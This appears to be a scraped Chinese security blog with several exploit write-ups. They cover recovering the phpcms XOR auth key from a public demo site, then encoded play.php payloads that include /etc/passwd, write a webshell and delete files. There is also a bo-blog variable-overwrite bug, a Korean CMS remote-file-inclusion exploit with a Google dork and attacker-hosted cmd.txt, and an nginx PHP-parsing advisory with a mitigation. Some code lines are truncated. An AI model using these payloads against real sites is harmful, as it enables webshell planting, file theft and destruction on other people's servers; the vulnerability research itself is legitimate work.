这就意味这我们可以得到全部密文(只要电话或邮箱的长度大于20位即可)，不费什么力气。

——————–
举例说明
1.在http://demo.phpcms.cn随便注册个普通用户会员
2.在跳蚤市场那

http://demo.phpcms.cn/info/sale/

随便点开一个信息页点右侧的【免费发布信息】 http://demo.phpcms.cn/contribute.php?catid=22
随便发一条信息
使用邮箱为
mailc4rp3nt3r@gmail.com
3.最后找到我们发布的信息:

http://demo.phpcms.cn/2011/0405/366.html

查看邮箱图片的地址

http://demo.phpcms.cn/magic_image.php?gd=1&fonttype=4&txt=ADcCAw9wKjtaOhNGAS0uPQorC14OOQY%3D

——————–

好了
明文:mailc4rp3nt3r@gmail.com
密文:ADcCAw9wKjtaOhNGAS0uPQorC14OOQY%3D

解密一下:
$key="mailc4rp3nt3r@gmail.com"; $txt='ADcCAw9wKjtaOhNGAS0uPQorC14OOQY%3D'; $txt=base64_decode(urldecode($txt));

for($i=0;$i
运行结果:
$ php /var/www/vul.php
OXdcFVodxAcbCUeTgLBgOXdc

我们的密钥就是：
OXdcFVodxAcbCUeTgLBg

phpcms本地包含漏洞导致的写shell漏洞和删除任意文件漏洞

admin — Mon, 04 Apr 2011 11:17:30 +0000

by c4rp3nt3r@0x50sec.org
phpcms2008 sp2 or sp4偶没仔细看
这年头发个bug伤不起啊，厂商忽略，被人当成装X，有木有，心情不爽啊不管这么多了。

phpcms本地包含拿shell的方法，这篇文章接上一个

http://www.wooyun.org/bugs/wooyun-2010-01795

《phpcms的phpcms_auth导致的任意变量覆盖漏洞、本地文件包含漏洞和任意文件下载漏洞》

phpcms本地包含类漏洞，如果该文件包含了/include/common.inc.php就可以包含执行很多后台才能执行的文件了。

由于phpcms的全局变量机制，导致能拿shell的方法很多，类似的问题不止一个。

admin/safe.inc.php文件是后台扫木马的程序，但是很可惜的是虽然文件名叫做safe，但是一点也不safe。

公布一个本地包含秒杀拿shell的方法。

包含:admin/safe.inc.php文件GET提交一下数据

将在根目录下生成一句话
用上一篇得到的密钥$key=’sIpeofogblFVCildZEwe’;
加密如下字符串
$evil=’i=1&m=1&f=fuck&action=edit_code&file_path=evil.php&code=&mod=../../admin/safe.inc.php%00′;

http://127.0.0.1/n/phpcms/play.php?a_k=GnRBQwJbXkEEUSAjIAJKBTkxHgoddBUBBhIwBA0II3AlAAABBTUWERt0FRMGCkEXChxgNSwNCVlmehITEiVYQTA2IDQ2NycLalZSQjcqE1hdZ19LQUkOAw8FKHkwCAoBdCwZBl05GBVKVl8=

将在根目录下生成一句话木马

同理任意文件删除漏洞：
$evil=’i=1&m=1&f=fuck&action=del_file&files=robots.txt&mod=../../admin/safe.inc.php%00′;

http://127.0.0.1/n/phpcms/play.php?a_k=GnRBQwJbXkEEUSAjIAJKBTkxHgoddBQAAzkJDg4JYDAqBQkXZzcYBxw9A0sbHhtBDwMia21HQ0p0ahYBHiAeShwHCQJMBSg1bRkEFH91Rw==

贴上存在漏洞的代码
//admin/safe.inc.php
defined(‘IN_PHPCMS’) or exit(‘Access Denied’);
// include/common.inc.php 里面声明了常量
// define(‘IN_PHPCMS’, TRUE);

if(empty($action)) $action = “start”;
$safe = cache_read(‘safe.php’);
$filecheck = load(‘filecheck.class.php’);
if(empty($safe))
{
$safe = array (
‘file_type’ => ‘php|js’,
‘code’ => ”,
‘func’ => ‘com|system|exec|eval|escapeshell|cmd|passthru|base64_decode|gzuncompress’,
‘dir’ => $filecheck->checked_dirs()
);
}
switch ($action)
{
…
case ‘edit_code’:
if (file_put_contents(PHPCMS_ROOT.$file_path, stripcslashes($code)))
{
showmessage(‘修改成功！’);
}
break;

case ‘del_file’:
$file_path = urldecode($files);

if (empty($file_path))
{
showmessage(‘请选择文件’);
}
$file_list = cache_read(‘scan_backdoor.php’);
unset($file_list[$file_path]);
cache_write(‘scan_backdoor.php’,$file_list);
@unlink(PHPCMS_ROOT.$file_path);
showmessage(‘文件删除成功！’, ‘?mod=phpcms&file=safe&action=scan_table’);
break;
…

phpcms的phpcms_auth导致的任意变量覆盖漏洞、本地文件包含漏洞和任意文件下载漏洞

admin — Sat, 02 Apr 2011 05:41:15 +0000

phpcms的phpcms_auth导致的本地文件包含漏洞和任意文件下载漏洞

by c4rp3nt3r@0x50sec.org
mail: c4rp3nt3r#gmail.com
HomePage:http://www.0x50sec.org

phpcms_auth函数是phpcms里面为了增强程序的安全性的一个加密函数，在play.php、down.php 、download.php等等文件用它来对用户提交的加密字符串进行解密，进入程序流程，如果我们可以控制了phpcms_auth函数的解密，我们就可以通过注射我们的恶意代码，进行攻击。
而phpcms_auth采用的是可逆的位异或算法，并且对加密的结果进行了base64编码。
对于位异或算法来说只要我们破解了密钥字符串$key我们就完全控制了这个函数的加密解密。
对于base64编码主要是处理某些加密后的不可见字符，但是这给了我们一个很好的机会:
就是说我们破解了$key之后，我们就可以不受magic_quotes_pgc的限制引入%00字符串进行阶段，或者引入引号发起其他攻击。
到此已经违背了这个程序设计的初衷，破解了这个函数之后，一方面反而更加不安全了，另一方面所有建立在这个函数之上的机制可能都会受到攻击。

// include/global.func.php function phpcms_auth($txt, $operation = 'ENCODE', $key = '') { $key = $key ? $key : $GLOBALS['phpcms_auth_key']; $txt = $operation == 'ENCODE' ? $txt : base64_decode($txt); $len = strlen($key); $code = '';

for($i=0; $i $k = $i % $len; //循环使用密钥字符串对字符串逐位进行异或 $code .= $txt[$i] ^ $key[$k]; } $code = $operation == 'DECODE' ? $code : base64_encode($code); return $code; }

对于$key的破解
对于位运算的异或运算，是可逆的，明文和密钥异或得到密文。如果我们知道密文并且知道一部分明文那么我们也就可以得到密钥，有了密钥我们就可以破解另一部分密文，当然也就可以对我们自己的明文进行加密，然后用我们精心构造的密文发起攻击了。

不幸的是phpcms的确给了我们可用来破解密钥的明文。

// include/fields/downfile/output.inc.php

function downfile($field, $value) { $contentid = $this->contentid; $mode = $this->fields[$field]['mode']; $result = ''; if($mode) { $servers = $this->fields[$field]['servers']; $downloadtype = $this->fields[$field]['downloadtype']; $servers = explode("\n",$servers); foreach($servers AS $k=>$server) { $server = explode("|",$server); $serverurl = $server[1]; $a_k = urlencode(phpcms_auth("i=$contentid&s=$serverurl&m=1&f=$value&d=$downloadtype", 'ENCODE', AUTH_KEY)); $result .= "$server[0]"; } } else { $a_k = urlencode(phpcms_auth("i=$contentid&m=0&f=$value", 'ENCODE', AUTH_KEY)); $result = "点击下载"; } return $result; }

这个文件是用来生成静态html文件的，默认安装的phpcms某个软件的下载页面地址为:

http://127.0.0.1/n/phpcms/2011/0331/2.html

进入下载文件的下载地址为:

http://127.0.0.1/n/phpcms/down.php?a_k=GnRCQxxbSQpfXGAwfhwcCDUkEwMaJRVKXVZeVk1cdWVyRl5Ua3RHVkB4QVdeVFxUVVpweDkAHEI%2BeEY%3D

对加密字符串解密后为
密文:GnRCQxxbSQpfXGAwfhwcCDUkEwMaJRVKXVZeVk1cdWVyRl5Ua3RHVkB4QVdeVFxUVVpweDkAHEI%2BeEY%3D
明文:i=2&s=&m=0&f=uploadfile/2011/0331/20110331121233766.zip&d=1
这里2.html的2就是数据库里id的值，如果没有设置镜像站点的话$serverurl为空
也就是说”i=2&s=&m=1&f=”是不会变的，我们可以破解12位的密钥了。
默认的话密钥有20位，如果用户上传目录没修改的话我们知道的明文就有”i=2&s=&m=0&f=uploadfile”共23个字符，可以得到全部密钥了。

$key="i=2&s=&m=0&f=uploadfile"; $txt='GnRCQxxbSQpfXGAwfhwcCDUkEwMaJRVKXVZeVk1cdWVyRl5Ua3RHVkB4QVdeVFxUVVpweDkAHEI%2BeEY%3D'; $txt=base64_decode(urldecode($txt)); $len=strlen($key); echo $len; for($i=0;$i { $code .= $txt[$i] ^ $key[$i]; } echo $code; ?>
运行结果为:sIpeofogblFVCildZEwesIp
可以看到sIp开始下一个循环加密了，所以密钥就是:sIpeofogblFVCildZEwe

还有一点就是下载的时候我们可以得到文件名:20110331121233766.zip
d的值是下载文件的类型，假设我们不知道也不要紧
就是说明文:20110331121233766.zip&d=是已知的有24位
密文:GnRCQxxbSQpfXGAwfhwcCDUkEwMaJRVKXVZeVk1cdWVyRl5Ua3RHVkB4QVdeVFxUVVpweDkAHEI%2BeEY%3D

$key="20110331121233766.zip&d="; $txt='GnRCQxxbSQpfXGAwfhwcCDUkEwMaJRVKXVZeVk1cdWVyRl5Ua3RHVkB4QVdeVFxUVVpweDkAHEI%2BeEY%3D';

$txt=base64_decode(urldecode($txt)); $tlen=strlen($txt); $klen=strlen($key); for($i=1;$i { $code .= $txt[$tlen-$i-1] ^ $key[$klen-$i]; } echo $code."\n"; echo $tlen."\n"; ?>
运行结果为:
EZdliCVFlbgofoepIsewEZd
59
来看phpcms_auth源码
/* ... $len = strlen($key); ...

for($i=0; $i $k = $i % $len; $code .= $txt[$i] ^ $key[$k]; } ... */

我们可以知道
$key[17]=’E';
我们可以得到倒序的密钥字符串:
ewEZdliCVFlbgofoepIs

然后我们把字符串翻转过来终端下执行：

alone@Sh3llc0de:~$ echo ‘ewEZdliCVFlbgofoepIs’|rev
sIpeofogblFVCildZEwe

我们的密钥字符串就是:sIpeofogblFVCildZEwe

到此我们已经从一个攻击者的角度破解出了密钥。接下来我们看看由此引发的几个安全问题
————————————-

1.phpcms2008 sp2-sp4 本地文件包含漏洞
这个漏洞跟boblog刚爆出的任意变量覆盖漏洞有些相似，都是任意变量覆盖然后仅跟了一个本地文件包含。这种漏洞也是很好玩的，攻击的方法更灵活。

//play.php require dirname(__FILE__).'/include/common.inc.php'; if(!isset($a_k)) showmessage($LANG['illegal_parameters']); //common.inc.php文件的全局变量机制已经将所有GPC数据导出为变量了 //所以$a_k=$_GET[$a_k]; $a_k = phpcms_auth($a_k, 'DECODE', AUTH_KEY); //这里是关键分析见上文


if(empty($a_k)) showmessage($LANG['illegal_parameters']);

unset($i, $m, $f, $p);

parse_str($a_k);    //parse_str处理解密后的$a_k将导致变量覆盖

//通过覆盖下文的$mod 或者$templateid将触发本地文件包含漏洞

//由于我们提交的密文会经过phpcms_auth函数中base64解密的，所以直接无视magic_quotes_gpc的影响而可以NULL字符截断

//但是高版本的PHP修复了%00的攻击缺陷
if(isset($i)) $i = intval($i);

if(!isset($m)) showmessage($LANG['illegal_parameters']);
if(empty($f)) showmessage('地址失效');

if(preg_match('/\.php$/',$f) || strpos($f, ":\\")) showmessage('地址有误');

if(!$i || $m<0) showmessage($LANG['illegal_parameters']);

$allow_readpoint = 1;

// include global.fuc.php

/*

...

$M = $TEMP = array();

if(!isset($mod)) $mod = 'phpcms';

if($mod != 'phpcms')

{

isset($MODULE[$mod]) or exit($LANG['module_not_exists']);

$langfile = defined('IN_ADMIN') ? $mod.'_admin' : $mod;

@include PHPCMS_ROOT.'languages/'.LANG.'/'.$langfile.'.lang.php';

$M = cache_read('module_'.$mod.'.php');

}

...

*/

//此处通过上文的对$mod进行变量覆盖绕过下面的if语句

if($mod == 'phpcms')

{

$contentid = $i;

include 'admin/content.class.php';

$content = new content;

$data = $content->get($contentid);

$readpoint = $data['readpoint'];
$title = $data['title'];

$keys = array_keys($data);
if(in_array('groupids_view',$keys))

{

if($data['groupids_view'])

{

if(!$priv_group->check('contentid', $contentid, 'view', $_groupid)) showmessage('您没有查看权限');

}

if(in_array('readpoint', $keys))

{

$C = cache_read('category_'.$data['catid'].'.php');

if($C['defaultchargepoint'] || !empty($readpoint))

{

$readpoint = $readpoint ? $readpoint : $C['defaultchargepoint'];

$pay = load('pay_api.class.php', 'pay', 'api');

if($C['repeatchargedays'])

{

if($pay->is_exchanged($contentid, $C['repeatchargedays']) === FALSE)

{

$allow_readpoint = 0;

}

}

else

{

session_start();

if($_SESSION['pay_contentid'] != $contentid) $allow_readpoint = 0;

}

}

}

}

}
$player = load('player.class.php');

$result = $player->get($p);

@extract($result);

$videourl = trim($f);

$code = str_replace('{$filepath}',$videourl, $code);

$code = str_replace('{$PHPCMS[siteurl]}', $PHPCMS['siteurl'], $code);

$code = str_replace('{$PHPCMS[sitename]}', $PHPCMS['sitename'], $code);

$templateid = $templateid ? $templateid : 'play';

include template($mod, $templateid);

/*

// include/global.fuc.php

// function template 起到一个连接字符串的作用
function template($module = 'phpcms', $template = 'index', $istag = 0)

{

$compiledtplfile = TPL_CACHEPATH.$module.'_'.$template.'.tpl.php';

if(TPL_REFRESH && (!file_exists($compiledtplfile) || @filemtime(TPL_ROOT.TPL_NAME.'/'.$module.'/'.$template.'.html') > @filemtime($compiledtplfile) || @filemtime(TPL_ROOT.TPL_NAME.'/tag.inc.php') > @filemtime($compiledtplfile)))

{

require_once PHPCMS_ROOT.'include/template.func.php';

template_compile($module, $template, $istag);

}

return $compiledtplfile;

}

*/ ?>

接下来生成我们的攻击字符串:
$key='sIpeofogblFVCildZEwe'; $evil='i=1&m=1&f=fuck&mod=../../../../../../../etc/passwd%00&c4rp3nt3r=0x50sec.org'; //经过parse_str($evil);后c4rp3nt3r变量并没有被创建 //这个地方我也不是很明白为什么可以进行截断 //但事实上真的可以截断


$evil = phpcms_auth($evil, 'ENCODE', $key);

echo $evil."\n";

function phpcms_auth($txt, $operation = 'ENCODE', $key)

{

$txt    = $operation == 'ENCODE' ? $txt : base64_decode($txt);

$len    = strlen($key);

$code    = '';

for($i=0; $i $k = $i % $len; $code .= $txt[$i] ^ $key[$k]; } $code = $operation == 'DECODE' ? $code : base64_encode($code); return $code; } ?>

alone@Sh3llc0de:/var/www$ php v.php
GnRBQwJbXkEEUSAjIAJKCTUhSktdZl5LQEhBSExCaXhtRkJKdWtZShY9E0ofBxwUFQhjZnNPD1AoNUQLB3oCWF8eWlcRCSV4LBsL

POC：http://127.0.0.1/n/phpcms/play.php?a_k=GnRBQwJbXkEEUSAjIAJKCTUhSktdZl5LQEhBSExCaXhtRkJKdWtZShY9E0ofBxwUFQhjZnNPD1AoNUQLB3oCWF8eWlcRCSV4LBsL
成功包含了/etc/passwd

2.phpcms2008 sp2-sp4、PHPCMS V9 正式版任意文件下载漏洞

以phpcms2008为例

down.php 和download.php都存在这个漏洞，具体利用跟上面的文件包含差不多就不多罗嗦了，成功利用此漏洞可以下载任意文件，包括.php后缀的文件。
只是download.php的加密方式是：
//download.php
…
$phpcms_auth_key = md5(AUTH_KEY.$_SERVER['HTTP_USER_AGENT']);
$a_k = phpcms_auth($a_k, ‘DECODE’, $phpcms_auth_key);
…
这样可能主要是为了仿制迅雷等浏览器的下载。但是既然我们知道了AUTH_KEY(见上文分析的密钥$key),$_SERVER['HTTP_USER_AGENT']是由用户提交的，那么$phpcms_auth_key 我们自然也就知道了。
除了上面说的知道部分明文来算$key，还有可能暴力破解$key.
还有就是经过md5加密后也未必就更安全，因为系统生成的$key有20位但是每一位都肯能个是大写或者小写字母，也就是有52种可能，但是经过md5加密后每一位就变成只有16种可能了，大大增加了被暴力破解的可能性。

全文结束
参考和致谢:
80vul.com《高级PHP应用程序漏洞审核技术》
Ryat[puretot] 《bo-blog任意变量覆盖漏洞》

bo-blog任意变量覆盖漏洞

admin — Thu, 03 Mar 2011 08:34:02 +0000

by Ryat[puretot]
mail: puretot at gmail dot com
team: http://www.80vul.com
影响版本:
2.1.0 2.1.1
状态：已修补
漏洞描述:

// go.php
$q_url=$_SERVER["REQUEST_URI"];
@list($relativePath, $rawURL)=@explode(‘/go.php/’, $q_url);
$rewritedURL=$rawURL; // 来自$_SERVER["REQUEST_URI"],可以任意提交的:)
…
$RewriteRules[]=”/component\/([^\/]+)\/?/”;
// 这个正则限制的不够细致,可以很轻易的绕过:)
…
$RedirectTo[]=”page.php?pagealias=\\1″;

$i=0;
foreach ($RewriteRules as $rule) {
if (preg_match($rule, $rewritedURL)) {
$tmp_rewritedURL=preg_replace($rule, ‘<’.$RedirectTo[$i].’<’, $rewritedURL, 1);
$tmp_rewritedURL=@explode(‘<’, $tmp_rewritedURL);
$rewritedURL=($tmp_rewritedURL[2]) ? false : $tmp_rewritedURL[1];
break;
}
$i+=1;
}

if ($rewritedURL==$rawURL || !$rewritedURL) {
…
$parsedURL=parse_url ($rewritedURL);
// 这里的$parsedURL['query']就是要利用的变量了:)
parse_str($parsedURL['query']);
// 通过这个地方可以覆盖任意变量
include(basename($parsedURL['path']));
// 通过上面的覆盖,可以利用这里包含本地文件,不过用了basename()函数处理:(

这个漏洞不是很复杂,关键说说利用,这里有两个利用点,一个覆盖,一个利用覆盖来包含,虽然用了basename()来限制,但是可以利用data://来执行命令.只是这种方式的利用是有限制的[PHP>5.2.0&allow_url_include=On].不过没关系,还有更好的利用方式

来看下global.php文件:
…
unregister_GLOBALS(); //When register_globals=On
…
function unregister_GLOBALS() { //When register_globals = ‘on’
if (!ini_get(‘register_globals’)) { //Already off
return;
}
// Variables that shouldn’t be unset
$noUnset = array(‘_GET’, ‘_POST’, ‘_COOKIE’, ‘_REQUEST’, ‘_SERVER’, ‘_ENV’, ‘_FILES’);
$input = array_merge($_GET, $_POST, $_COOKIE, $_SERVER, $_ENV, $_FILES, isset($_SESSION) && is_array($_SESSION) ? $_SESSION : array());
foreach ($input as $k => $v) {
if ($k==’GLOBALS’) {
global $kgr;
$kgr=0;
kill_GLOBALS($input[$k]); //GLOBALS is recursive -,-
}
elseif (!in_array($k, $noUnset) && isset($GLOBALS[$k])) {
$GLOBALS[$k]=NULL;
}
}
}
在这里取消了全局变量,但是我们可以通过go.php中的覆盖变量和包含文件来绕过unregister_GLOBALS()的限制,触发变量未初始化漏洞,这将导致xss、sql注射、命令执行等众多严重的安全问题:)

EXP or POC?自己搞喽;P

___________

学习了下，可以通过data://来执行命令的站相对少一点，但是通过触发变量未初始化漏洞，基本都能拿到shell.

韩国某cms远程包含、注射、文件泄漏、上传等多个漏洞

admin — Thu, 17 Jun 2010 06:54:52 +0000

来源:0x50sec.org

无意中发现的，名字未知，版本不详，问题一堆

Google Dork: inurl:bbs_sun/board.php

board.php文件内容如下:

————————–
if(!$admin) $pgUp .= “../”;
else if($admin==’N') $pgUp .= “”;

include $pgUp.”inc/dbconn.php”;
include $pgUp.”bbs_sun/config.php”;
?>

/style.css” rel=”stylesheet” type=”text/css”>
if($mode == “list”) include ($skinSrc.”/list.php”);
else if($mode == “write” || $mode == “modify” || $mode == “reply”) include ($skinSrc.”/write.php”);
else if($mode == “view”) include ($skinSrc.”/view.php”);
else if($mode == “delete” || $mode == “ment_delete”) include ($skinSrc.”/delete.php”);
?>
————————–

此处存在远程文件包含漏洞

EXP:

http://xxxx.kr/bbs_sun/board.php?admin=0x50sec.org&pgUp=http://www.0x50sec.org/evil.txt?

board.php?admin=0x50sec.org&pgUp=http://www.0x50sec.org/evil.txt?&skinSrc=http://www.0x50sec.org/cmd.txt?&cmd=id&mode=view

有的含有download.php文件，对file变量和bname变量都没有进行必要的检查，导致文件泄漏漏洞:

EXP:

http://xxxx.kr/s_board_text/download.php?file=../../../../../etc/passwd&bname=../

mode变量为view时,有的版本对number变量没有过滤导致SQL注射漏洞

mode=view&number=

mode变量为write时,有的版本对管理权限的验证存在问题可以被绕过，从而可以发布文章和上传文件。

打开一条记录，将mode=view直接改为write就可以上传了。

可能还存在其他的问题比如文件删除等，懒得看了。

nginx文件类型错误解析漏洞

admin — Mon, 24 May 2010 03:46:59 +0000

nginx文件类型错误解析漏洞
来源:80sec.com
原文链接:http://www.80sec.com/nginx-securit.html

漏洞介绍：nginx是一款高性能的web服务器，使用非常广泛，其不仅经常被用作反向代理，也可以非常好的支持PHP的运行。80sec发现其中存在一个较为严重的安全问题，默认情况下可能导致服务器错误的将任何类型的文件以PHP的方式进行解析，这将导致严重的安全问题，使得恶意的攻击者可能攻陷支持php的nginx服务器。

漏洞分析：nginx默认以cgi的方式支持php的运行，譬如在配置文件当中可以以

location ~ \.php$ {
root html;
fastcgi_pass 127.0.0.1:9000;
fastcgi_index index.php;
fastcgi_param SCRIPT_FILENAME /scripts$fastcgi_script_name;
include fastcgi_params;
}

的方式支持对php的解析，location对请求进行选择的时候会使用URI环境变量进行选择，其中传递到后端Fastcgi的关键变量 SCRIPT_FILENAME由nginx生成的$fastcgi_script_name决定，而通过分析可以看到$fastcgi_script_name是直接由URI环境变量控制的，这里就是产生问题的点。而为了较好的支持PATH_INFO的提取，在PHP 的配置选项里存在cgi.fix_pathinfo选项，其目的是为了从SCRIPT_FILENAME里取出真正的脚本名。
那么假设存在一个http://www.80sec.com/80sec.jpg，我们以如下的方式去访问

http://www.80sec.com/80sec.jpg/80sec.php

将会得到一个URI

/80sec.jpg/80sec.php

经过location指令，该请求将会交给后端的fastcgi处理，nginx为其设置环境变量SCRIPT_FILENAME，内容为

/scripts/80sec.jpg/80sec.php

而在其他的webserver如lighttpd当中，我们发现其中的SCRIPT_FILENAME被正确的设置为

/scripts/80sec.jpg

所以不存在此问题。
后端的fastcgi在接受到该选项时，会根据fix_pathinfo配置决定是否对SCRIPT_FILENAME进行额外的处理，一般情况下如果不对fix_pathinfo进行设置将影响使用PATH_INFO进行路由选择的应用，所以该选项一般配置开启。Php通过该选项之后将查找其中真正的脚本文件名字，查找的方式也是查看文件是否存在，这个时候将分离出SCRIPT_FILENAME和PATH_INFO分别为

/scripts/80sec.jpg和80sec.php

最后，以/scripts/80sec.jpg作为此次请求需要执行的脚本，攻击者就可以实现让nginx以php来解析任何类型的文件了。

POC：访问一个nginx来支持php的站点，在一个任何资源的文件如robots.txt后面加上/80sec.php，这个时候你可以看到如下的区别：

访问http://www.80sec.com/robots.txt

HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Thu, 20 May 2010 10:05:30 GMT
Content-Type: text/plain
Content-Length: 18
Last-Modified: Thu, 20 May 2010 06:26:34 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Accept-Ranges: bytes

访问访问http://www.80sec.com/robots.txt/80sec.php

HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Thu, 20 May 2010 10:06:49 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=20
X-Powered-By: PHP/5.2.6

其中的Content-Type的变化说明了后端负责解析的变化，该站点就可能存在漏洞。

漏洞厂商：http://www.nginx.org

解决方案：

我们已经尝试联系官方，但是此前你可以通过以下的方式来减少损失

关闭cgi.fix_pathinfo为0

或者

if ( $fastcgi_script_name ~ \..*\/.*php ) {
return 403;
}

PS: 鸣谢laruence大牛在分析过程中给的帮助